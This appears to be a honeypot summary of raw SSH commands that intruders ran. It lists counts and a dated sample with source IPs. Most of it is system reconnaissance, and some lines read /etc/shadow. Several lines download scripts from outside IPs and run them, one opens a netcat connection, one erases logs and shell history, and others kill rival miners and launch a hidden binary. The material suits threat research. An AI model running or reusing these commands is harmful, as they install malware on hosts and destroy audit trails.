RAW SSH EXEC COMMAND CORPUS

total raw exec commands (own test traffic excluded): 1488

Most repeated exact commands:

   70 cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats

   66 /bin/./uname -s -v -n -r -m

   65 uptime -p

   58 lspci | grep VGA | cut -f5- -d ' '

   56 lspci | grep VGA -c

   47 nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'

   46 uname -a

   42 pwd

   42 whoami

   39 lspci | grep "3D controller" | cut -f5- -d ' '

   35 nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | grep . -c 

   27 id

   25 ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10

   25 ps aux | grep astats | grep -v grep | wc -l

   24 uname -s -m

   24 

   24 uname -s -v -n -r -m

   23 sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done'

   23 cat /proc/cpuinfo | grep processor | wc -l

   23 cd "bash: sh: command not found

   17 env | head -10

   17 ps aux | head -10

   17 netstat -tulpn | head -10

   17 ls -la /

   17 history | tail -5

   17 cat /proc/cpuinfo | grep 'model name' | head -1

   17 hostname

   17 uptime

   17 mount | head -5

   17 netstat -tulpn 2>/dev/null | grep LISTEN | head -20

   16 ls -la /etc/network/interfaces /etc/sysconfig/network-scripts/ /etc/netplan/ 2>/dev/null | head -5

   16 ip addr show 2>/dev/null | grep -E '^[0-9]+:' | head -5

   16 ip route show 2>/dev/null | head -3

   16 cat /etc/passwd 2>/dev/null | head -1

   16 cat /etc/shadow 2>/dev/null | head -1

   16 cat /proc/version 2>/dev/null | head -1

   16 uname -r

   16 which apt

   16 which yum

   16 which pacman

   16 which zypper

   16 systemctl list-units --type=service --state=running 2>/dev/null | head -10

   16 ping -c 1 8.8.8.8 2>/dev/null | grep '1 packets transmitted'

   16 time dd if=/dev/zero of=/tmp/test bs=1M count=10 2>&1

   16 rm -f /tmp/test

   16 ss -tuln 2>/dev/null | wc -l

   16 ssh -V

   15 uname -m | awk '{printf $1}'

   11 echo -n login_success

    9 uname -m

    9 ls /

    9 cat /etc/hostname

    8 cat /proc/cpuinfo

    7 sudo sh -c "pids=$(pgrep -af 'kstats' | grep -vE 'ssh|sshd|bash|sh|pkill|pgrep' | awk '{print $1}'); [ -n \"$pids\" ] && kill -9 $pids || pkill -x 'kstats' || true"

    6 sudo -n true

    6 nproc 

    6 lspci | egrep VGA && lspci | grep 3D

    5 uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; (wget --no-check-certificate -qO- https://204.76.203.196/sh || curl -sk https://204.76.203.196/sh) | sh -s ssh

    4 nproc

    4 unset LANG LANGUAGE LC_CTYPE LC_COLLATE LC_MONETARY LC_NUMERIC LC_TIME LC_MESSAGES LC_ALL HUMAN_BLOCKS LS_COLORS;cd '.';cd '.';cd '.';pwd;ls -la

    4 while true; do sleep 1;head -v -n 8 /proc/meminfo; head -v -n 2 /proc/stat /proc/version /proc/uptime /proc/loadavg /proc/sys/fs/file-nr /proc/sys/kernel/hostname; tail -v -n 32 /proc/net/dev;echo '==> /proc/df <==';df -l;echo '==> /proc/who <==';who;echo '==> /proc/end <==';echo '##Moba##'; done

    4 sudo sh -c "cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; find . -type f -name 'kstats' -delete ; find . -type f -name 'c.lock' -delete; kill -9 $(ps aux | grep kproc | grep -v grep | awk '{print $2}') 2>/dev/null || true; kill -9 $(ps aux | grep bstats | grep -v grep | awk '{print $2}') 2>/dev/null || true; kill -9 $(ps aux | grep istats | grep -v grep | awk '{print $2}') 2>/dev/null || true"

    4 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://87.121.79.73/ok; curl -O http://87.121.79.73/ok; chmod 777 ok; sh ok; rm -rf ok; rm -rf ok.*

    4 uname -a ; echo 'vT'

    4 uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; (wget --no-check-certificate -qO- https://125.135.169.171/sh || curl -sk https://125.135.169.171/sh) | sh -s ssh

    3 lsblk -o SIZE | grep -v SIZE | head -n 1

    3 lspci | grep VGA | cut -d ":" -f3 || echo None

    3 free -h | awk '/Mem/ {print $2}'

    3 cut -d' ' -f1 /proc/uptime

    3 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb NO_COLOR=1 /bin/sh -c 'whoami'

    3 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb NO_COLOR=1 /bin/sh -c 'pwd'

    2 lscpu | grep "Model name" | sed -r 's/Model name:\s+//'

    2 unset LANG LANGUAGE LC_CTYPE LC_COLLATE LC_MONETARY LC_NUMERIC LC_TIME LC_MESSAGES LC_ALL HUMAN_BLOCKS LS_COLORS; echo $$;ps -ef

    2 sudo -l

    2 grep -E "CentOS|Red Hat|AlmaLinux|Rocky" /etc/os-release 2>/dev/null || true

    2 /bin/sh

    2 unset HISTFILE; uname -a; history -c

    2 uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; (wget --no-check-certificate -qO- https://217.60.241.36/sh || curl -sk https://217.60.241.36/sh) | sh -s ssh

    2 cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

    2 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb NO_COLOR=1 /bin/sh -c 'id'

    2 nc 89.42.231.109 800

    1 echo 'SSH check'

    1 echo OK

    1 lscpu | grep 'Model name' | sed -r 's/Model name:\s+//'

    1 free -h | head -2

    1 df -h | head -5

    1 ssh -V 2>&1

    1 nproc || grep -c processor /proc/cpuinfo

    1 lspci | grep -i vga || lspci | grep -i nvidia || echo 'No GPU info'

    1 echo 'test' > /tmp/test_1776577976

    1 rm -f /tmp/test_1776577976

    1 export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH

    1 cat /etc/passwd

    1 passwd

    1 rm -rf .bash_history;rm -rf /var/run/utmp;rm -rf /var/run/wtmp -;rm -rf /var/log/lastlog;rm -rf /usr/adm/lastlog;rm -rf .bash_history;cd /home;rm -rf yum.log;cd /var/log/;rm -rf wtmp;rm -rf secure;rm -rf lastlog;rm -rf messages;touch messagess;touch wtmp;touch secure;touch lastlog;cd /root;rm -rf .bash_history;touch .bash_history;unset HISTFILE;unset HISTSAVE;history -n;unset WATCH;cd;HISTFILE=/dev/null;history -c && rm -f ~/.bash_history;cd ..

    1 uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; (wget --no-check-certificate -qO- https://46.151.182.82/sh || curl -sk https://46.151.182.82/sh) | sh -s ssh

    1 nproc 2>/dev/null || (grep -c '^processor' /proc/cpuinfo 2>/dev/null) || echo 0

    1 grep 'model name' /proc/cpuinfo 2>/dev/null | head -1 | cut -d ':' -f2- | sed 's/^ *//' | xargs || echo unknown

    1 uname -m 2>/dev/null || echo unknown

    1 echo test > /tmp/test_1776792796935632465

    1 rm -f /tmp/test_1776792796935632465

    1 echo 'test' > /tmp/test_1776823331

    1 rm -f /tmp/test_1776823331

    1 echo 'test' > /tmp/test_1776864708

    1 rm -f /tmp/test_1776864708

    1 echo 'test' > /tmp/test_1776868206

    1 rm -f /tmp/test_1776868206

    1 echo 'test' > /tmp/test_1776904642

    1 rm -f /tmp/test_1776904642

    1 echo 'test' > /tmp/test_1776939933

    1 rm -f /tmp/test_1776939933

    1 echo 'test' > /tmp/test_1776997251

    1 rm -f /tmp/test_1776997251

    1 cd "/tmp" && if [ ! -f "w.sh" ]; then cat > "w.sh" && chmod +x w.sh; fi

    1 echo 'test' > /tmp/test_1777075507

    1 rm -f /tmp/test_1777075507

    1 sudo sh -c "pids=$(pgrep -af 'astats' | grep -vE 'ssh|sshd|bash|sh|pkill|pgrep' | awk '{print $1}'); [ -n \"$pids\" ] && kill -9 $pids || pkill -x 'astats' || true"

    1 sudo sh -c "cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; find . -type f -name 'kstats' -delete ; find . -type f -name 'c.lock' -delete ; find . -type f -name 'astats' -delete ; find . -type f -name 's.lock' -delete; kill -9 $(ps aux | grep kproc | grep -v grep | awk '{print $2}') 2>/dev/null || true; kill -9 $(ps aux | grep bstats | grep -v grep | awk '{print $2}') 2>/dev/null || true; kill -9 $(ps aux | grep istats | grep -v grep | awk '{print $2}') 2>/dev/null || true"

    1 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.132.197/cat.sh; curl -O http://176.65.132.197/cat.sh; chmod 777 cat.sh; sh cat.sh; tftp 176.65.132.197 -c get cat.sh; chmod 777 cat.sh; sh cat.sh; tftp -r cat2.sh -g 176.65.132.197; chmod 777 cat2.sh; sh cat2.sh; ftpget -v -u anonymous -p anonymous -P 21 176.65.132.197 cat1.sh cat1.sh; sh cat1.sh; rm -rf cat.sh cat.sh cat2.sh cat1.sh; rm -rf *; echo 'vT'

    1 echo 'test' > /tmp/test_1777210902

    1 rm -f /tmp/test_1777210902

    1 sudo sh -c "cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; find . -type f -name 'kstats' -delete ; find . -type f -name 'c.lock' -delete ; find . -type f -name 'kstats' -delete ; find . -type f -name 'c.lock' -delete; kill -9 $(ps aux | grep kproc | grep -v grep | awk '{print $2}') 2>/dev/null || true; kill -9 $(ps aux | grep bstats | grep -v grep | awk '{print $2}') 2>/dev/null || true; kill -9 $(ps aux | grep istats | grep -v grep | awk '{print $2}') 2>/dev/null || true"

    1 echo 'test' > /tmp/test_1777216019

    1 rm -f /tmp/test_1777216019

    1 echo 'test' > /tmp/test_1777218240

    1 rm -f /tmp/test_1777218240

    1 echo 'test' > /tmp/test_1777299382

    1 rm -f /tmp/test_1777299382

    1 nproc --all

    1 nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9}' || echo 'No' 

    1 nvidia-smi -q | grep "Attached GPUs" | awk '{print $4}' && echo '' || echo 'No'

    1 echo 'test' > /tmp/test_1777397531

    1 rm -f /tmp/test_1777397531

    1 echo SHELL_TEST

    1 cat /proc

    1 ./

    1 chmod +x /tmp/.sorry_5AZDN6aH

    1 nohup /tmp/.sorry_5AZDN6aH >/tmp/.sorry_o72GPexb.log 2>&1 &

    1 echo 'test' > /tmp/test_1777646785

    1 rm -f /tmp/test_1777646785

    1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb NO_COLOR=1 /bin/sh -c '/bin/hostname 2>/dev/null'

    1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb NO_COLOR=1 /bin/sh -c 'ls -la /'

    1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb NO_COLOR=1 /bin/sh -c 'ps aux | head -10'

    1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb NO_COLOR=1 /bin/sh -c 'history | tail -5'

    1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb NO_COLOR=1 /bin/sh -c 'ssh -V 2>&1'

    1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb NO_COLOR=1 /bin/sh -c 'uptime'

    1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb NO_COLOR=1 /bin/sh -c '/bin/uname -a 2>/dev/null'

    1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb NO_COLOR=1 /bin/sh -c 'netstat -tulpn | head -10'

    1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb NO_COLOR=1 /bin/sh -c 'mount | head -5'

    1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb NO_COLOR=1 /bin/sh -c 'env | head -10'

Chronological raw exec command sample:
line=227 conn=14 peer=117.50.130.63 user=root cmd=uname -s -m
line=406 conn=37 peer=78.128.112.74 user=support cmd=echo 'SSH check'
line=1264 conn=158 peer=104.131.69.242 user=root cmd=echo OK
line=1281 conn=159 peer=104.131.69.242 user=root cmd=lsblk -o SIZE | grep -v SIZE | head -n 1
line=1298 conn=160 peer=104.131.69.242 user=root cmd=lspci | grep VGA | cut -d ":" -f3 || echo None
line=1315 conn=161 peer=104.131.69.242 user=root cmd=uname -m
line=1332 conn=162 peer=104.131.69.242 user=root cmd=lscpu | grep 'Model name' | sed -r 's/Model name:\s+//'
line=1349 conn=163 peer=104.131.69.242 user=root cmd=nproc
line=1366 conn=164 peer=104.131.69.242 user=root cmd=free -h | awk '/Mem/ {print $2}'
line=1696 conn=211 peer=200.89.69.247 user=root cmd=env | head -10
line=1703 conn=211 peer=200.89.69.247 user=root cmd=free -h | head -2
line=1710 conn=211 peer=200.89.69.247 user=root cmd=df -h | head -5
line=1717 conn=211 peer=200.89.69.247 user=root cmd=uname -a
line=1724 conn=211 peer=200.89.69.247 user=root cmd=ps aux | head -10
line=1731 conn=211 peer=200.89.69.247 user=root cmd=netstat -tulpn | head -10
line=1738 conn=211 peer=200.89.69.247 user=root cmd=pwd
line=1745 conn=211 peer=200.89.69.247 user=root cmd=ls -la /
line=1752 conn=211 peer=200.89.69.247 user=root cmd=history | tail -5
line=1759 conn=211 peer=200.89.69.247 user=root cmd=ssh -V 2>&1
line=1767 conn=211 peer=200.89.69.247 user=root cmd=cat /proc/cpuinfo | grep 'model name' | head -1
line=1774 conn=211 peer=200.89.69.247 user=root cmd=nproc || grep -c processor /proc/cpuinfo
line=1781 conn=211 peer=200.89.69.247 user=root cmd=lspci | grep -i vga || lspci | grep -i nvidia || echo 'No GPU info'
line=1788 conn=211 peer=200.89.69.247 user=root cmd=hostname
line=1795 conn=211 peer=200.89.69.247 user=root cmd=whoami
line=1802 conn=211 peer=200.89.69.247 user=root cmd=uptime
line=1809 conn=211 peer=200.89.69.247 user=root cmd=mount | head -5
line=1816 conn=211 peer=200.89.69.247 user=root cmd=netstat -tulpn 2>/dev/null | grep LISTEN | head -20
line=1823 conn=211 peer=200.89.69.247 user=root cmd=ls -la /etc/network/interfaces /etc/sysconfig/network-scripts/ /etc/netplan/ 2>/dev/null | head -5
line=1830 conn=211 peer=200.89.69.247 user=root cmd=ip addr show 2>/dev/null | grep -E '^[0-9]+:' | head -5
line=1837 conn=211 peer=200.89.69.247 user=root cmd=ip route show 2>/dev/null | head -3
line=1844 conn=211 peer=200.89.69.247 user=root cmd=echo 'test' > /tmp/test_1776577976
line=1851 conn=211 peer=200.89.69.247 user=root cmd=rm -f /tmp/test_1776577976
line=1858 conn=211 peer=200.89.69.247 user=root cmd=cat /etc/passwd 2>/dev/null | head -1
line=1865 conn=211 peer=200.89.69.247 user=root cmd=cat /etc/shadow 2>/dev/null | head -1
line=1872 conn=211 peer=200.89.69.247 user=root cmd=cat /proc/version 2>/dev/null | head -1
line=1884 conn=211 peer=200.89.69.247 user=root cmd=id
line=1891 conn=211 peer=200.89.69.247 user=root cmd=whoami
line=1898 conn=211 peer=200.89.69.247 user=root cmd=pwd
line=1905 conn=211 peer=200.89.69.247 user=root cmd=cat /proc/cpuinfo | grep 'model name' | head -1
line=1912 conn=211 peer=200.89.69.247 user=root cmd=uname -r
line=1919 conn=211 peer=200.89.69.247 user=root cmd=which apt
line=1926 conn=211 peer=200.89.69.247 user=root cmd=which yum
line=1933 conn=211 peer=200.89.69.247 user=root cmd=which pacman
line=1940 conn=211 peer=200.89.69.247 user=root cmd=which zypper
line=1947 conn=211 peer=200.89.69.247 user=root cmd=systemctl list-units --type=service --state=running 2>/dev/null | head -10
line=1954 conn=211 peer=200.89.69.247 user=root cmd=ping -c 1 8.8.8.8 2>/dev/null | grep '1 packets transmitted'
line=1961 conn=211 peer=200.89.69.247 user=root cmd=time dd if=/dev/zero of=/tmp/test bs=1M count=10 2>&1
line=1968 conn=211 peer=200.89.69.247 user=root cmd=rm -f /tmp/test
line=1975 conn=211 peer=200.89.69.247 user=root cmd=ss -tuln 2>/dev/null | wc -l
line=2268 conn=247 peer=213.209.159.158 user=root cmd=uname -a
line=3978 conn=471 peer=223.93.70.207 user=root cmd=uname -s -m
line=4401 conn=527 peer=153.35.171.225 user=root cmd=uname -s -m
line=4588 conn=554 peer=5.75.203.70 user=root cmd=uname -a
line=4595 conn=554 peer=5.75.203.70 user=root cmd=uname -m
line=4602 conn=554 peer=5.75.203.70 user=root cmd=free -h | awk '/Mem/ {print $2}'
line=4609 conn=554 peer=5.75.203.70 user=root cmd=lscpu | grep "Model name" | sed -r 's/Model name:\s+//'
line=4616 conn=554 peer=5.75.203.70 user=root cmd=nproc
line=4623 conn=554 peer=5.75.203.70 user=root cmd=lspci | grep VGA | cut -d ":" -f3 || echo None
line=4630 conn=554 peer=5.75.203.70 user=root cmd=lsblk -o SIZE | grep -v SIZE | head -n 1
line=4683 conn=559 peer=5.75.203.70 user=root cmd=unset LANG LANGUAGE LC_CTYPE LC_COLLATE LC_MONETARY LC_NUMERIC LC_TIME LC_MESSAGES LC_ALL HUMAN_BLOCKS LS_COLORS;cd '.';cd '.';cd '.';pwd;ls -la
line=4684 conn=559 peer=5.75.203.70 user=root cmd=while true; do sleep 1;head -v -n 8 /proc/meminfo; head -v -n 2 /proc/stat /proc/version /proc/uptime /proc/loadavg /proc/sys/fs/file-nr /proc/sys/kernel/hostname; tail -v -n 32 /proc/net/dev;echo '==> /proc/df <==';df -l;echo '==> /proc/who <==';who;echo '==> /proc/end <==';echo '##Moba##'; done
line=4697 conn=559 peer=5.75.203.70 user=root cmd=unset LANG LANGUAGE LC_CTYPE LC_COLLATE LC_MONETARY LC_NUMERIC LC_TIME LC_MESSAGES LC_ALL HUMAN_BLOCKS LS_COLORS; echo $$;ps -ef
line=4880 conn=585 peer=2.57.122.238 user=sol cmd=/bin/./uname -s -v -n -r -m
line=4887 conn=585 peer=2.57.122.238 user=sol cmd=uptime -p
line=4894 conn=585 peer=2.57.122.238 user=sol cmd=lspci | grep VGA | cut -f5- -d ' '
line=4901 conn=585 peer=2.57.122.238 user=sol cmd=lspci | grep VGA -c
line=4908 conn=585 peer=2.57.122.238 user=sol cmd=nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'
line=4915 conn=585 peer=2.57.122.238 user=sol cmd=lspci | grep "3D controller" | cut -f5- -d ' '
line=5197 conn=623 peer=161.132.4.167 user=root cmd=export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH
line=5385 conn=644 peer=5.75.203.70 user=root cmd=unset LANG LANGUAGE LC_CTYPE LC_COLLATE LC_MONETARY LC_NUMERIC LC_TIME LC_MESSAGES LC_ALL HUMAN_BLOCKS LS_COLORS;cd '.';cd '.';cd '.';pwd;ls -la
line=5386 conn=644 peer=5.75.203.70 user=root cmd=while true; do sleep 1;head -v -n 8 /proc/meminfo; head -v -n 2 /proc/stat /proc/version /proc/uptime /proc/loadavg /proc/sys/fs/file-nr /proc/sys/kernel/hostname; tail -v -n 32 /proc/net/dev;echo '==> /proc/df <==';df -l;echo '==> /proc/who <==';who;echo '==> /proc/end <==';echo '##Moba##'; done
line=5399 conn=644 peer=5.75.203.70 user=root cmd=unset LANG LANGUAGE LC_CTYPE LC_COLLATE LC_MONETARY LC_NUMERIC LC_TIME LC_MESSAGES LC_ALL HUMAN_BLOCKS LS_COLORS; echo $$;ps -ef
line=5476 conn=653 peer=39.104.94.99 user=kube cmd=uname -a
line=5483 conn=653 peer=39.104.94.99 user=kube cmd=cat /etc/passwd
line=5492 conn=653 peer=39.104.94.99 user=kube cmd=passwd
line=5499 conn=653 peer=39.104.94.99 user=kube cmd=rm -rf .bash_history;rm -rf /var/run/utmp;rm -rf /var/run/wtmp -;rm -rf /var/log/lastlog;rm -rf /usr/adm/lastlog;rm -rf .bash_history;cd /home;rm -rf yum.log;cd /var/log/;rm -rf wtmp;rm -rf secure;rm -rf lastlog;rm -rf messages;touch messagess;touch wtmp;touch secure;touch lastlog;cd /root;rm -rf .bash_history;touch .bash_history;unset HISTFILE;unset HISTSAVE;history -n;unset WATCH;cd;HISTFILE=/dev/null;history -c && rm -f ~/.bash_history;cd ..
line=5516 conn=654 peer=86.38.24.97 user=kube cmd=uname -a
line=5523 conn=654 peer=86.38.24.97 user=kube cmd=cut -d' ' -f1 /proc/uptime
line=5530 conn=654 peer=86.38.24.97 user=kube cmd=sudo -l
line=5537 conn=654 peer=86.38.24.97 user=kube cmd=sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done'
line=5544 conn=654 peer=86.38.24.97 user=kube cmd=cat /proc/cpuinfo | grep processor | wc -l
line=5552 conn=654 peer=86.38.24.97 user=kube cmd=cd "bash: sh: command not found
line=5563 conn=654 peer=86.38.24.97 user=kube cmd=grep -E "CentOS|Red Hat|AlmaLinux|Rocky" /etc/os-release 2>/dev/null || true
line=5572 conn=654 peer=86.38.24.97 user=kube cmd=
line=5597 conn=654 peer=86.38.24.97 user=kube cmd=ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10
line=5604 conn=654 peer=86.38.24.97 user=kube cmd=ps aux | grep astats | grep -v grep | wc -l
line=5611 conn=654 peer=86.38.24.97 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=5618 conn=654 peer=86.38.24.97 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=5625 conn=654 peer=86.38.24.97 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=5672 conn=659 peer=47.236.116.235 user=kube cmd=uname -a
line=5679 conn=659 peer=47.236.116.235 user=kube cmd=cut -d' ' -f1 /proc/uptime
line=5686 conn=659 peer=47.236.116.235 user=kube cmd=sudo -l
line=5693 conn=659 peer=47.236.116.235 user=kube cmd=sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done'
line=5700 conn=659 peer=47.236.116.235 user=kube cmd=cat /proc/cpuinfo | grep processor | wc -l
line=5708 conn=659 peer=47.236.116.235 user=kube cmd=cd "bash: sh: command not found
line=5719 conn=659 peer=47.236.116.235 user=kube cmd=grep -E "CentOS|Red Hat|AlmaLinux|Rocky" /etc/os-release 2>/dev/null || true
line=5728 conn=659 peer=47.236.116.235 user=kube cmd=
line=5753 conn=659 peer=47.236.116.235 user=kube cmd=ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10
line=5760 conn=659 peer=47.236.116.235 user=kube cmd=ps aux | grep astats | grep -v grep | wc -l
line=5767 conn=659 peer=47.236.116.235 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=5774 conn=659 peer=47.236.116.235 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=5781 conn=659 peer=47.236.116.235 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=5962 conn=685 peer=193.32.162.145 user=ubuntu cmd=/bin/./uname -s -v -n -r -m
line=5969 conn=685 peer=193.32.162.145 user=ubuntu cmd=uptime -p
line=5976 conn=685 peer=193.32.162.145 user=ubuntu cmd=lspci | grep VGA | cut -f5- -d ' '
line=5983 conn=685 peer=193.32.162.145 user=ubuntu cmd=lspci | grep VGA -c
line=5990 conn=685 peer=193.32.162.145 user=ubuntu cmd=nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'
line=5997 conn=685 peer=193.32.162.145 user=ubuntu cmd=lspci | grep "3D controller" | cut -f5- -d ' '
line=6004 conn=685 peer=193.32.162.145 user=ubuntu cmd=nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | grep . -c 
line=6246 conn=716 peer=2.57.122.238 user=sol cmd=/bin/./uname -s -v -n -r -m
line=6253 conn=716 peer=2.57.122.238 user=sol cmd=uptime -p
line=6260 conn=716 peer=2.57.122.238 user=sol cmd=lspci | grep VGA | cut -f5- -d ' '
line=6267 conn=716 peer=2.57.122.238 user=sol cmd=lspci | grep VGA -c
line=6274 conn=716 peer=2.57.122.238 user=sol cmd=nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'
line=6281 conn=716 peer=2.57.122.238 user=sol cmd=lspci | grep "3D controller" | cut -f5- -d ' '
line=6953 conn=804 peer=80.94.92.184 user=solv cmd=/bin/./uname -s -v -n -r -m
line=6960 conn=804 peer=80.94.92.184 user=solv cmd=uptime -p
line=6967 conn=804 peer=80.94.92.184 user=solv cmd=lspci | grep VGA | cut -f5- -d ' '
line=7797 conn=914 peer=2.57.122.238 user=sol cmd=/bin/./uname -s -v -n -r -m
line=7804 conn=914 peer=2.57.122.238 user=sol cmd=uptime -p
line=7811 conn=914 peer=2.57.122.238 user=sol cmd=lspci | grep VGA | cut -f5- -d ' '
line=7818 conn=914 peer=2.57.122.238 user=sol cmd=lspci | grep VGA -c
line=7825 conn=914 peer=2.57.122.238 user=sol cmd=nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'
line=7832 conn=914 peer=2.57.122.238 user=sol cmd=lspci | grep "3D controller" | cut -f5- -d ' '
line=7839 conn=914 peer=2.57.122.238 user=sol cmd=nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | grep . -c 
line=24884 conn=3742 peer=149.210.235.123 user=kube cmd=uname -a
line=24891 conn=3742 peer=149.210.235.123 user=kube cmd=sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done'
line=24898 conn=3742 peer=149.210.235.123 user=kube cmd=cat /proc/cpuinfo | grep processor | wc -l
line=24906 conn=3742 peer=149.210.235.123 user=kube cmd=cd "bash: sh: command not found
line=24917 conn=3742 peer=149.210.235.123 user=kube cmd=
line=24940 conn=3742 peer=149.210.235.123 user=kube cmd=ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10
line=24947 conn=3742 peer=149.210.235.123 user=kube cmd=ps aux | grep astats | grep -v grep | wc -l
line=24954 conn=3742 peer=149.210.235.123 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=24961 conn=3742 peer=149.210.235.123 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=25205 conn=3774 peer=45.148.10.183 user=forti cmd=/bin/./uname -s -v -n -r -m
line=25212 conn=3774 peer=45.148.10.183 user=forti cmd=uptime -p
line=25219 conn=3774 peer=45.148.10.183 user=forti cmd=lspci | grep VGA | cut -f5- -d ' '
line=25226 conn=3774 peer=45.148.10.183 user=forti cmd=lspci | grep VGA -c
line=25233 conn=3774 peer=45.148.10.183 user=forti cmd=nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'
line=25240 conn=3774 peer=45.148.10.183 user=forti cmd=lspci | grep "3D controller" | cut -f5- -d ' '
line=25247 conn=3774 peer=45.148.10.183 user=forti cmd=nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | grep . -c 
line=25502 conn=3809 peer=221.178.246.21 user=root cmd=uname -s -m
line=25568 conn=3817 peer=149.210.235.123 user=kube cmd=uname -a
line=25575 conn=3817 peer=149.210.235.123 user=kube cmd=sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done'
line=25582 conn=3817 peer=149.210.235.123 user=kube cmd=cat /proc/cpuinfo | grep processor | wc -l
line=25590 conn=3817 peer=149.210.235.123 user=kube cmd=cd "bash: sh: command not found
line=25601 conn=3817 peer=149.210.235.123 user=kube cmd=
line=25624 conn=3817 peer=149.210.235.123 user=kube cmd=ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10
line=25631 conn=3817 peer=149.210.235.123 user=kube cmd=ps aux | grep astats | grep -v grep | wc -l
line=25638 conn=3817 peer=149.210.235.123 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=25645 conn=3817 peer=149.210.235.123 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=25652 conn=3817 peer=149.210.235.123 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=25721 conn=3826 peer=122.193.64.145 user=root cmd=uname -s -m
line=25910 conn=3852 peer=86.38.24.201 user=kube cmd=sudo -n true
line=25917 conn=3852 peer=86.38.24.201 user=kube cmd=sudo sh -c "pids=$(pgrep -af 'kstats' | grep -vE 'ssh|sshd|bash|sh|pkill|pgrep' | awk '{print $1}'); [ -n \"$pids\" ] && kill -9 $pids || pkill -x 'kstats' || true"
